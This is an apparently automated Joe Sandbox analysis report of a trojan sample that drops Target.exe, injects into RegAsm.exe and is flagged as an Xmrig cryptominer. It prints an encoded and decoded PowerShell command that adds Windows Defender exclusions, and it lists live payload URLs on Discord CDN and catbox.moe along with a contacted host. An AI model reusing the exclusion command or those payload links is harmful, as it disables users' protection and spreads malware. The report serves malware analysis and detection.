QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA
                      Source: unknownProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\XsdType\Target.exe,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\jones\AppData\Local\Temp\ -Force; Add-MpPreference -ExclusionProcess C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\jones\AppData\Roaming\XsdType\Target.exe
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeThread register set: target process: 7008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 4B6000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 3B0FB0E010Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwawabzagqavab5ahaazqbcafqayqbyagcazqb0ac4azqb4agualabdadoaxabxagkabgbkag8adwbzafwatqbpagmacgbvahmabwbmahqalgboaeuavabcaeyacgbhag0azqb3ag8acgbradyanabcahyanaauadaalgazadaamwaxadkaxabbagqazabjag4auabyag8aywblahmacwauaguaeablacwaqwa6afwavqbzaguacgbzafwaagbvag4azqbzafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxaagac0argbvahiaywbladsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaaqwa6afwavwbpag4azabvahcacwbcae0aaqbjahiabwbzag8azgb0ac4atgbfafqaxabgahiayqbtaguadwbvahiaawa2adqaxab2adqalgawac4amwawadmamqa5afwaqqbkagqasqbuafaacgbvagmazqbzahmalgblahgazqasaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwawabzagqavab5ahaazqbcafqayqbyagcazqb0ac4azqb4agua
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeQueries volume information: C:\Users\user\AppData\Roaming\XsdType\Target.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeQueries volume information: C:\Users\user\AppData\Roaming\XsdType\Target.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                      Windows Management Instrumentation
                      11
                      Scheduled Task/Job
                      311
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping231
                      Security Software Discovery
                      Remote Services11
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      11
                      Scheduled Task/Job
                      1
                      Modify Registry
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts11
                      Scheduled Task/Job
                      Logon Script (Windows)1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      Security Account Manager141
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell
                      Login HookLogin Hook141
                      Virtualization/Sandbox Evasion
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
                      Process Injection
                      LSA Secrets123
                      System Information Discovery
                      SSHKeylogging3
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Deobfuscate/Decode Files or Information
                      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Obfuscated Files or Information
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546576 Sample: SecuriteInfo.com.Trojan.Inj... Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 35 fla1337.site 2->35 37 cdn.discordapp.com 2->37 43 Antivirus / Scanner detection for submitted sample 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected Xmrig cryptocurrency miner 2->47 49 12 other signatures 2->49 7 Target.exe 3 2->7         started        10 SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe 6 2->10         started        13 powershell.exe 23 2->13         started        15 Target.exe 2->15         started        signatures3 process4 file5 51 Antivirus detection for dropped file 7->51 53 Multi AV Scanner detection for dropped file 7->53 55 Machine Learning detection for dropped file 7->55 61 3 other signatures 7->61 17 RegAsm.exe 16 2 7->17         started        25 C:\Users\user\AppData\Roaming\...\Target.exe, PE32+ 10->25 dropped 27 C:\Users\user\...\Target.exe:Zone.Identifier, ASCII 10->27 dropped 29 SecuriteInfo.com.T...24588.10142.exe.log, CSV 10->29 dropped 57 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 10->57 59 Loading BitLocker PowerShell Module 13->59 21 conhost.exe 13->21         started        23 WmiPrvSE.exe 13->23         started        signatures6 process7 dnsIp8 31 fla1337.site 147.189.173.36, 1010, 49730, 49731 JANETJiscServicesLimitedGB United Kingdom 17->31 33 cdn.discordapp.com 162.159.135.233, 443, 49732 CLOUDFLARENETUS United States 17->33 39 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 17->39 41 Found strings related to Crypto-Mining 17->41 signatures9

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe45%ReversingLabsWin64.Trojan.Generic
                      SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe56%VirustotalBrowse
                      SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe100%AviraHEUR/AGEN.1358722
                      SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\XsdType\Target.exe100%AviraHEUR/AGEN.1358722
                      C:\Users\user\AppData\Roaming\XsdType\Target.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\XsdType\Target.exe45%ReversingLabsWin32.Trojan.Generic
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      cdn.discordapp.com0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                      https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                      https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                      https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      fla1337.site
                      147.189.173.36
                      truefalse
                        unknown
                        cdn.discordapp.com
                        162.159.135.233
                        truefalseunknown
                        NameMaliciousAntivirus DetectionReputation
                        https://cdn.discordapp.com/attachments/1301574231573663746/1301575510102507551/plugin3.dll?ex=6724fa27&is=6723a8a7&hm=de75ef4bcda6b9340b0357973edbc8ae95f493136ccb6eede12840c8370e40e0&false
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://stackoverflow.com/q/14436606/23354Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://github.com/mgravell/protobuf-netJSecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://ion=v4.535umerpowershell.exe, 00000001.00000002.1801867950.000001D144F20000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://contoso.com/Licensepowershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://github.com/mgravell/protobuf-netSecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://files.catbox.moe/kwfxr7.dllRegAsm.exe, 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://cdn.discordapp.com/attachments/1301574231573663746/1301575510102507551/plugin3.dll?ex=6724faRegAsm.exe, 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://files.catbox.moe/k541xr.dll0RegAsm.exe, 00000004.00000002.4115219254.000001DC43F58000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4112743576.000001DC42495000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://github.com/mgravell/protobuf-netiSecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://stackoverflow.com/q/11564914/23354;SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://stackoverflow.com/q/2152978/23354SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1731931353.000001D12CC1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contoso.com/powershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1786095523.000001D13CA5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://aka.ms/pscore68powershell.exe, 00000001.00000002.1731931353.000001D12C9F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://files.catbox.moe/k541xr.dllRegAsm.exe, 00000004.00000002.4115219254.000001DC43F58000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4115219254.000001DC43F8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://schemas.micOpowershell.exe, 00000001.00000002.1803041646.000001D145052000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1675197443.000001FC00346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1731931353.000001D12C9F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4115219254.000001DC43E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            147.189.173.36
                                            fla1337.siteUnited Kingdom
                                            786JANETJiscServicesLimitedGBfalse
                                            162.159.135.233
                                            cdn.discordapp.comUnited States
                                            13335CLOUDFLARENETUSfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1546576
                                            Start date and time:2024-11-01 06:21:04 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 24s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:12
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.mine.winEXE@8/9@2/2
                                            EGA Information:
                                            • Successful, ratio: 20%
                                            HCA Information:Failed
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target RegAsm.exe, PID 7008 because it is empty
                                            • Execution Graph export aborted for target SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, PID 6256 because it is empty
                                            • Execution Graph export aborted for target Target.exe, PID 1544 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 6496 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            TimeTypeDescription
                                            01:21:55API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe modified
                                            01:21:58API Interceptor22x Sleep call for process: powershell.exe modified
                                            01:21:59API Interceptor7380097x Sleep call for process: RegAsm.exe modified
